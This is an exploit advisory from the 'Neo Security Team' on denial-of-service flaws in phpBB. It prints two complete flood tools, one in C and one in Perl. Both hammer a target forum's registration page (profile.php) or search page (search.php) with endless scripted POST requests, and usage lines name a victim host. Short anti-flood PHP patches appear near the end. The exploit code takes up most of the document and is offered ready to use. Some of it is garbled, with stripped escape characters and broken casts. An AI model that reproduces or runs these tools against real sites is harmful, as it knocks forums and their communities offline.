Program: phpBB
Homepage: http://www.phpbb.com
Vulnerable Versions: All phpBB versions
Risk: High Risk!!
Impact: Multiple DoS Vulnerabilities.
phpBB is a high powered, fully scalable, and highly customizable
Open Source bulletin board package. phpBB has a user-friendly
interface, simple and straightforward administration panel, and
helpful FAQ. Based on the powerful PHP server language and your
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,
phpBB is the ideal free community solution for all web sites.
many forums
profile.php << By registering as many users as you can. The registration has to ve deactived the security
code image.
search.php << by searching in a way that the db couln't observe it.
This vulnerability has discovered in the version 2.0.15 but it works in all versions if the security image
code is not activ
ated. The exploits used were published some months ago, you can check it out in www.neosecurityteam.net
[C Source]
/*
Name: NsT-phpBBDoS
Copyright: NeoSecurityteam
Author: HaCkZaTaN
Date: 19/06/05
Description: xD You must figure out the problem xD
root@NeoSecurity:/home/hackzatan# pico NsT-phpBBDoS.c
root@NeoSecurity:/home/hackzatan# gcc NsT-phpBBDoS.c -o NsT-phpBBDoS
root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS
[+] NsT-phpBBDoS v0.1 by HaCkZaTaN
[+] NeoSecurityTeam
[+] Dos has begun…[+]
[] Use: ./NsT-phpBBDoS
[] Example: ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com
root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com
[+] NsT-phpBBDoS v0.1 by HaCkZaTaN [+]
[+] NeoSecurityTeam [+]
[+] Dos has begun…[+]
…
root@NeoSecurity:/home/hackzatan# echo "Let see how many users I have created"
Let see how many users I have created
root@NeoSecurity:/home/hackzatan# set | grep MACHTYPE
MACHTYPE=i486-slackware-linux-gnu
root@NeoSecurity:/home/hackzatan#
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#ifdef WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#pragma pack(1)
#define WIN32_LEAN_AND_MEAN
#else
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif
#define __USE_GNU
#define _XOPEN_SOURCE
int Connection(char *, int);
void Write_In(int , char *, char *, char *, int);
char Use(char *);
int main(int argc, char *argv[])
{
int sock, x = 0;
char *Path = argv[1], *Pro_Sea = argv[2], *Host = argv[3];
puts("[+] NsT-phpBBDoS v0.1 by HaCkZaTaN [+]");
puts("[+] NeoSecurityTeam [+]");
puts("[+] Dos has begun…[+]
");
fflush(stdout);
if(argc != 4) Use(argv[0]);
while(1)
{
sock = Connection(Host,80);
Write_In(sock, Path, Pro_Sea, Host, x);
#ifndef WIN32
shutdown(sock, SHUT_WR);
close(sock);
#else
closesocket(sock);
WSACleanup();
#endif
Pro_Sea = argv[2];
x++;
}
//I don't think that it will get here =)
return 0;
}
int Connection(char *Host, int Port)
{
#ifndef WIN32
#define SOCKET int
#else
int error;
WSADATA wsadata;
error = WSAStartup(MAKEWORD(2, 2), &wsadata);
if (error == SOCKET_ERROR)
{
perror("Could Not Start Up Winsock!
");
return;
}
#endif
SOCKET sockfd;
struct sockaddr_in sin;
struct in_addr *myaddr;
struct hostent *h;
if(Port <= 0 || Port > 65535)
{
puts("[-] Invalid Port Number
");
fflush(stdout);
exit(-1);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
{
perror("socket() ");
fflush (stdout);
exit(-1);
}
if(isalpha(Host[0]))
{
if((h = gethostbyname(Host)) == NULL)
{
perror("gethostbyname() ");
fflush (stdout);
exit(-1);
}
}
else
{
myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
myaddr->s_addr=inet_addr(Host);
if((h = gethostbyaddr((char *) &myaddr, sizeof(myaddr), AF_INET)) != NULL)
{
perror("gethostbyaddr() ");
fflush (stdout);
exit(-1);
}
}
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(Port);
memcpy(&sin.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
if(connect(sockfd, (struct sockaddr *)&sin, sizeof(struct sockaddr_in)) < 0)
{
perror("connect() ");
exit (-1);
}
return sockfd;
}
void Write_In(int sock, char *Path, char *Pro_Sea, char *Host, int x)
{
char *str1 = (char )malloc(4BUFSIZ), *str2 = (char )malloc(4BUFSIZ);
char NsT[] = "x4Ex65x6Fx53x65x63x75x72x69x74x79x54x65x61x6D";
char req0 = "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
"
"Accept: /
"
"Accept-Language: en-us
"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7
"
"Accept encoding: gzip,deflate
"
"Keep-Alive: 300
"
"Proxy-Connection: keep-alive
"
"Content-Type: application/x-www-form-urlencoded
"
"Cache-Control: no-cache
"
"Pragma: no-cache
";
char *Profile =
".net&new_password=0123456&password_confirm=0123456&icq=&aim=&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=spanish&style=4&timezone=1&dateformat=l%2C+d+F+Y%2C+H%3Ai&mode=register&agreed=true&coppa=0&submit=Enviar
";
char Search =
"&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200
";
if(strcmp("profile.php", Pro_Sea) == 0) sprintf(str1, "username=N1sT__%d&email=N1sT__%d%%40%s%s", x, x,
NsT, Profile);
else if(strcmp("search.php", Pro_Sea) == 0)
{
Pro_Sea = "search.php?mode=results";
sprintf(str1, "search_keywords=Nst_%d%s", x, Search);
}
else
{
puts("Sorry. Try making the right choice");
exit(-1);
}
sprintf(str2, "POST %s%s HTTP/1.1
"
"Host: %s
"
"Referer: http://%s/
%s"
"Content-Length: %d
%s", Path, Pro_Sea, Host, Host, req0, strlen(str1), str1);
write(sock, str2, strlen(str2));
write(1, ".", 1);
fflush(stdout);
}
char Use(char program)
{
fprintf(stderr,"[] Use: %s
", program);
fprintf(stderr,"[*] Example: %s /phpBB/ profile.php Victimshost.com
", program);
fflush(stdout);
exit(-1);
}
/*
@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@@@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@
*/
/* EOF */
[Perl Source]
#!/usr/bin/perl
use IO::Socket;
$x = 0;
print q(
NsT-phpBBDoS v0.2 by HaCkZaTaN
ported to Perl By g30rg3_x
Neo Security Team
);
print q(Host |without http://www.| );
$host = ;
chop ($host);
print q(Path |example. /phpBB2/ or /| );
$pth = ;
chop ($pth);
print q(Flood Type |1 = Registration, 2 = Search| );
$type = ;
chop ($type);
if($type == 1){
while($x != 9999)
{
$uname = "username=NsT__" . "$x";
$umail = "&email=NsT__" . "$x";
$postit =
"$uname"."$umail"."%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";
$lrg = length $postit;
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "
The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!
" unless $sock;
print $sock "POST $pth"."profile.php HTTP/1.1
";
print $sock "Host: $host
";
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /
";
print $sock "Referer: $host
";
print $sock "Accept-Language: en-us
";
print $sock "Content-Type: application/x-www-form-urlencoded
";
print $sock "Accept-Encoding: gzip, deflate
";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
";
print $sock "Connection: Keep-Alive
";
print $sock "Cache-Control: no-cache
";
print $sock "Content-Length: $lrg
";
print $sock "$postit
";
close($sock);
syswrite STDOUT, ".";
$x++;
}
}
elsif ($type == 2){
while($x != 9999)
{
$postit =
"search_keywords=Neo+Security+Team+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
$lrg = length $postit;
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "
The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!
" unless $sock;
print $sock "POST $pth"."search.php?mode=results HTTP/1.1
";
print $sock "Host: $host
";
print $sock "Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5
";
print $sock "Referer: $host
";
print $sock "Accept-Language: en-us
";
print $sock "Content-Type: application/x-www-form-urlencoded
";
print $sock "Accept-Encoding: gzip, deflate
";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
";
print $sock "Connection: Keep-Alive
";
print $sock "Cache-Control: no-cache
";
print $sock "Content-Length: $lrg
";
print $sock "$postit
";
close($sock);
syswrite STDOUT, ".";
$x++;
}
}else{
die "Option not Allowed O_o???
";
}
/* Patch by Paisterist. Put this code after the "// Get current date" line */
phpBB2/includes/usercp_register.php
-usercp_register.php-
$flood=time()-120;
$query=$db->sql_query("Select user_regdate from " . USERS_TABLE . " where user_regdate>='" . $flood . "'
order by user_regdate desc");
if($db->sql_numrows($query)!=0)
{
$row=$db->sql_fetchrow($query);
$error=TRUE;
$error_msg="Protecciуn anti flood activada. Por favor espera " . $flood - $row['user_regdate'] . " segundos
y manda los datos de vuelta.";
}
else
{
-usercp_register.php-
===================================
/* Patch by Paisterist. Put this code after "// Define initial vars" */
phpBB2/search.php
-search.php-
if ($_GET['mode']=="results")
{
############
$fp=fopen("time.txt", "r");
$flood=fgets($fp, 1000);
if($flood>=time()-5)
{
message_die(GENERAL_MESSAGE, "Protecciуn anti flood activada. Intenta unos segundos mбs tarde");
fclose($fp);
exit(0);
}
else
{
$fp=fopen("time.txt", "w");
fwrite($fp, time());
fclose($fp);
}
-search.php-
http://www.neosecurityteam.net/index.php?action=advisories&id=18
[C Exploit] by HaCkZaTaN
[Perl Exploit] by g30rg3_x
[Patch] by Paisterist
[N]eo [S]ecurity [T]eam [NST]® - http://www.neosecurityteam.net/
Got Questions? http://www.neosecurityteam.net/foro/
irc.fullnetwork.org #nst [NeoSecurity IRC]
Daemon21
LINUX
erg0t
uyx
CrashCool
Makoki
KingMetal
r3v3ng4ns
T0wn3r
All Internal Fear Staff
Argentina, Mexico, Colombia, Chile, Uruguay EXISTS!!
@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@@@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@
*/
/* EOF */